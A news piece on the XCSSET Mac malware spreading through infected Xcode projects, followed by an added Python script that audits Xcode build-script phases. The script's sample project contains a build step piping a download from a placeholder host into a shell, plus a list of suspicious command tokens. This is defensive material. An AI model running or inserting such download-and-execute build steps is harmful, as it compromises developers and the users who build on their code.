Developers beware, you are the target of newly discovered Mac malware

Trend Micro security researchers have uncovered a new campaign that uses developers as the distribution channel for the XCSSET malware package, delivering it to unsuspecting Mac users. XCSSET is a new strain of Mac malware capable of hijacking Apple's Safari web browser and injecting malicious JavaScript payloads that can steal passwords, financial data, and personal information. The malware, which can also be used to deploy ransomware, was first discovered inside developers' Xcode projects. Xcode is the free integrated development environment (IDE) used by developers on macOS to build apps for iPhone, iPad, Mac, Apple Watch, and Apple TV.

Trend Micro researchers provided additional information about their discovery in a blog post, saying: "This scenario is quite unusual; in this case, malicious code is injected into local Xcode projects so that when the project is built, the malicious code is executed. This presents a risk to Xcode developers in particular. The threat has increased since we identified affected developers who shared their projects on GitHub, triggering a supply chain attack for users who rely on these repositories as dependencies in their own projects. We have also identified this threat from sources like VirusTotal, which indicates that this threat is on the run."

XCSSET malware

While cybercriminals often use phishing and spam emails to spread other types of malware, this new campaign spreads XCSSET by taking advantage of the fact that developers routinely share their work online. Trend Micro has already found XCSSET-infected Xcode projects on GitHub and VirusTotal, which means this new Mac malware is now making its way across the web.

Once XCSSET reaches a vulnerable system, the malware targets all installed browsers and uses exploits to steal user data. In Safari, XCSSET exploits a bug in the browser's Data Vault as well as a second vulnerability in the way Safari's WebKit engine works. The first bug lets the malware bypass macOS System Integrity Protection (SIP) to steal Safari cookies, while the second lets an attacker launch Universal Cross-Site Scripting (UXSS) attacks. According to Trend Micro, the UXSS bug can be used not only to steal user information but also to modify browser sessions so that they display malicious websites, change cryptocurrency wallet addresses, collect credit card information from the App Store, and steal credentials from various other services, including Apple ID, Google, PayPal, and Yandex.

To prevent the accidental spread of XCSSET, Trend Micro recommends that Xcode project owners triple check the integrity of their projects "to permanently eliminate unwarranted problems, such as malware infections on the 'upload.'"

Via ZDNet
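The mechanism described in the Trend Micro quote above (code injected into an Xcode project runs whenever the project is built) and the closing advice to check a project's integrity before sharing it or building it as a dependency both come down to the same review step: reading the shell-script build phases in a project's project.pbxproj file. The script below is an added example and is not code from the article, from ZDNet or from Trend Micro. It parses the pbxproj text for PBXShellScriptBuildPhase objects, lists each script, and marks the ones containing tokens from a constructed review list; the sample project fragment, its object ids and its scripts are invented for this example, and the token list is a generic triage heuristic, not an XCSSET signature.

```python
"""List and triage shell-script build phases in Xcode projects.

Added example, not code from the article or from Trend Micro. An Xcode
project keeps its build steps in <Name>.xcodeproj/project.pbxproj; a
PBXShellScriptBuildPhase object there runs an arbitrary shell script on
every build, which is the hook a tampered project can use. Listing those
phases lets a reviewer read them before building a repository that was
pulled in as a dependency.
"""
import os
import re
import sys
from dataclasses import dataclass, field
from typing import List

# Constructed sample fragment in the pbxproj (old-style plist) syntax;
# the object ids and scripts are invented for this example.
SAMPLE_PBXPROJ = r'''// !$*UTF8*$!
{
	objects = {
		AA01 /* Sources */ = {
			isa = PBXSourcesBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
		};
		AA02 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			name = "Lint";
			shellPath = /bin/sh;
			shellScript = "swiftlint lint --quiet\n";
		};
		AA03 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			shellPath = /bin/sh;
			shellScript = "curl -s http://example.invalid/x | sh\n";
		};
	};
}
'''

# Constructed review heuristics, not XCSSET signatures: tokens that rarely
# belong in the build script of a library and deserve a human look.
SUSPICIOUS = ("curl ", "wget ", "| sh", "| bash", "base64 -d", "base64 --decode",
              "osascript", "eval ", "nohup ", "launchctl ")

# An object header line:  <indent><id> /* comment */ = {
HEADER_RE = re.compile(r'^([ \t]*)(\w+)(?: /\* (.*?) \*/)? = \{[ \t]*$', re.M)


@dataclass
class ScriptPhase:
    object_id: str
    name: str
    shell_path: str
    script: str
    findings: List[str] = field(default_factory=list)


def _field(body: str, key: str) -> str:
    """Return a key's value from an object body, unescaping quoted strings."""
    m = re.search(r'\b' + key + r' = "((?:[^"\\]|\\.)*)";', body)
    if m:
        return re.sub(r'\\(.)', lambda e: {"n": "\n", "t": "\t"}.get(e.group(1), e.group(1)),
                      m.group(1))
    m = re.search(r'\b' + key + r' = ([^;]+);', body)
    return m.group(1).strip() if m else ""


def find_script_phases(text: str) -> List[ScriptPhase]:
    """Return every PBXShellScriptBuildPhase object in a pbxproj text."""
    phases = []
    for h in HEADER_RE.finditer(text):
        indent, object_id, comment = h.group(1), h.group(2), h.group(3) or ""
        # The object closes at the first "};" with the same indentation.
        close = re.search(r'^' + re.escape(indent) + r'\};', text[h.end():], re.M)
        if not close:
            continue
        body = text[h.end():h.end() + close.start()]
        # Only accept an isa line exactly one level deeper, so the enclosing
        # "objects" dictionary is not itself reported as a phase.
        first = re.search(r'^([ \t]*)\S', body, re.M)
        if not first:
            continue
        isa = r'^' + re.escape(first.group(1)) + r'isa = PBXShellScriptBuildPhase;'
        if not re.search(isa, body, re.M):
            continue
        script = _field(body, "shellScript")
        phases.append(ScriptPhase(
            object_id=object_id,
            name=_field(body, "name") or comment,
            shell_path=_field(body, "shellPath"),
            script=script,
            findings=[tok.strip() for tok in SUSPICIOUS if tok in script],
        ))
    return phases


def audit(text: str) -> List[ScriptPhase]:
    """Return only the phases that tripped a heuristic."""
    return [p for p in find_script_phases(text) if p.findings]


def scan_tree(root: str) -> List[str]:
    """One report line per script phase in every project.pbxproj below root."""
    lines = []
    for dirpath, _, files in os.walk(root):
        if "project.pbxproj" not in files:
            continue
        path = os.path.join(dirpath, "project.pbxproj")
        with open(path, encoding="utf-8", errors="replace") as fh:
            for p in find_script_phases(fh.read()):
                mark = "FLAG" if p.findings else "ok  "
                lines.append(f"{mark} {path} {p.object_id} {p.name!r}: {p.script.strip()!r}"
                             + (f"  <- {', '.join(p.findings)}" if p.findings else ""))
    return lines


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print("\n".join(scan_tree(sys.argv[1])) or "no script build phases found")
    else:
        for p in find_script_phases(SAMPLE_PBXPROJ):
            print(p.object_id, repr(p.name), p.findings)
```

Run it with a checkout directory as the argument to list every script phase in every project below it; run it with no argument to see the constructed sample, where the lint phase passes and the phase that pipes a download into a shell is flagged. The point of listing all phases, not only flagged ones, is that a reviewer should read each script before the first build, since the heuristic list is deliberately small and a tampered project can use commands that are not on it.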